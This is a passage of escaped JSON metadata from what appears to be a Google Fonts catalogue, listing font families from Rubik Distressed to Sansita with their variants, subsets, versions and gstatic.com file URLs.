\"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Distressed\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikdistressed/v1/GFDxWBdsmnqAVqjtUsZf2dcrQ2ldcWAhatVBaGM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Gemstones\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikgemstones/v1/zrf90HrL0-_8Xb4DFM2rUkWbOVrOiCnGqi1GMw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Glitch\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikglitch/v2/qkBSXv8b_srFRYQVYrDKh9ZvmC7HONiSFQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Iso\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikiso/v1/x3dickHUfr-S4VAI4sABfPACvy_1BA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Marker Hatch\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikmarkerhatch/v1/QldTNSFQsh0B_bFXXWv6LAt-jswapJHQDL4iw0H6zw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Maze\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikmaze/v1/xMQRuF9ZVa2ftiJEavXSAX7inS-bxV4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Microbe\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikmicrobe/v2/UqyWK8oPP3hjw6ANS9rM3PsZcs8aaKgiauE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Mono One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikmonoone/v14/UqyJK8kPP3hjw6ANTdfRk9YSN-8wRqQrc_j9.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Moonrocks\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikmoonrocks/v2/845ANMAmAI2VUZMLu_W0M7HqlDHnXcD7JGy1Sw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Puddles\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikpuddles/v2/1Ptog8bYX_qGnkLkrU5MJsQcJfC0wVMT-aE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Spray Paint\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikspraypaint/v1/WnzhHBAoeBPUDTB4EWR82y6EXWPH-Ro-QoaBZQxP.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Storm\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikstorm/v1/eLGYP-_uPgO5Ag7ju9JaouL9T2Xh9NQk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Vinyl\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikvinyl/v1/iJWABXKIfDnIV4mQ5BfjvUXexox2ztOU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Wet Paint\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikwetpaint/v2/HTx0L20uMDGHgdULcpTF3Oe4d_-F-zz313DuvQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ruda\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJFsi_-2KiSGg-H.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJ3si_-2KiSGg-H.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKbtS_-2KiSGg-H.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKitS_-2KiSGg-H.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLFtS_-2KiSGg-H.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLstS_-2KiSGg-H.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rufina\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rufina/v13/Yq6V-LyURyLy-aKyoxRktOdClg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rufina/v13/Yq6W-LyURyLy-aKKHztAvMxenxE0SA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ruge Boogie\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rugeboogie/v24/JIA3UVFwbHRF_GIWSMhKNROiPzUveSxy.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ruluko\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ruluko/v21/xMQVuFNZVaODtm0pC6WzKX_QmA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rum Raisin\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rumraisin/v20/nwpRtKu3Ih8D5avB4h2uJ3-IywA7eMM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ruslan Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ruslandisplay/v22/Gw6jwczl81XcIZuckK_e3UpfdzxrldyFvm1n.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Russo One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/russoone/v14/Z9XUDmZRWg6M1LvRYsH-yMOInrib9Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ruthie\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ruthie/v24/gokvH63sGkdqXuU9lD53Q2u_mQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rye\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rye/v13/r05XGLJT86YDFpTsXOqx4w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"STIX Two Text\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5Yihg2SOYWxFMN1WD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5YihS2SOYWxFMN1WD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5Yii-3iOYWxFMN1WD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5YiiH3iOYWxFMN1WD.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omsvbURVuMkWDmSo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omvnbURVuMkWDmSo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omhXcURVuMkWDmSo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omizcURVuMkWDmSo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sacramento\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sacramento/v13/buEzpo6gcdjy0EiZMBUG0CoV_NxLeiw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sahitya\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sahitya/v17/6qLAKZkOuhnuqlJAaScFPywEDnI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sahitya/v17/6qLFKZkOuhnuqlJAUZsqGyQvEnvSexI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sail\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sail/v16/DPEjYwiBxwYJFBTDADYAbvw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Saira\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA71rDosg7lwYmUVY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA79rCosg7lwYmUVY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA7wTCosg7lwYmUVY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA71rCosg7lwYmUVY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA72jCosg7lwYmUVY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA74TFosg7lwYmUVY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA773Fosg7lwYmUVY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA79rFosg7lwYmUVY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA7_PFosg7lwYmUVY.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBSooxkyQjQVYmxA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKByosxkyQjQVYmxA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBFIsxkyQjQVYmxA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBSosxkyQjQVYmxA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBeIsxkyQjQVYmxA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBlIwxkyQjQVYmxA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBrYwxkyQjQVYmxA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKByowxkyQjQVYmxA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKB44wxkyQjQVYmxA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Saira Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRMQgErUN8XuHNEtX81i9TmEkrnwetA2omSrzS8.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnbcpg8Keepi2lHw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnCclg8Keepi2lHw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJROQgErUN8XuHNEtX81i9TmEkrfpeFE-IyCrw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnUchg8Keepi2lHw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnfc9g8Keepi2lHw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnGc5g8Keepi2lHw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnBc1g8Keepi2lHw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnIcxg8Keepi2lHw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Saira Extra Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFsOHYr-vcC7h8MklGBkrvmUG9rbpkisrTri0jx9i5ss3a3.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrJ2nR3ABgum-uoQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrQ2rR3ABgum-uoQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFiOHYr-vcC7h8MklGBkrvmUG9rbpkisrTT70L11Ct8sw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrG2vR3ABgum-uoQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrN2zR3ABgum-uoQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrU23R3ABgum-uoQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrT27R3ABgum-uoQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTra2_R3ABgum-uoQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Saira Semi Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MN6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXdvaOM8rXT-8V8.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfDScMWg3j36Ebz.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXenSsMWg3j36Ebz.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MD6c-2-nnJkHxyCjRcnMHcWVWV1cWRRU8LYuceqGT-.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXf_S8MWg3j36Ebz.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfTTMMWg3j36Ebz.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXe3TcMWg3j36Ebz.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXerTsMWg3j36Ebz.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXePT8MWg3j36Ebz.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Saira Stencil One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sairastencilone/v14/SLXSc03I6HkvZGJ1GvvipLoYSTEL9AsMawif2YQ2.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Salsa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/salsa/v17/gNMKW3FiRpKj-imY8ncKEZez.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sanchez\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sanchez/v13/Ycm2sZJORluHnXbITm5b_BwE1l0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sanchez/v13/Ycm0sZJORluHnXbIfmxR-D4Bxl3gkw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sancreek\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sancreek/v23/pxiHypAnsdxUm159X7D-XV9NEe-K.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sansita\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sansita/v10/QldONTRRphEb_-V7HBm7TXFf3qw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sansita/v10/QldMNTRRphEb_-V7LBuxSVNazqx2xg.ttf\",\n        \"700\": 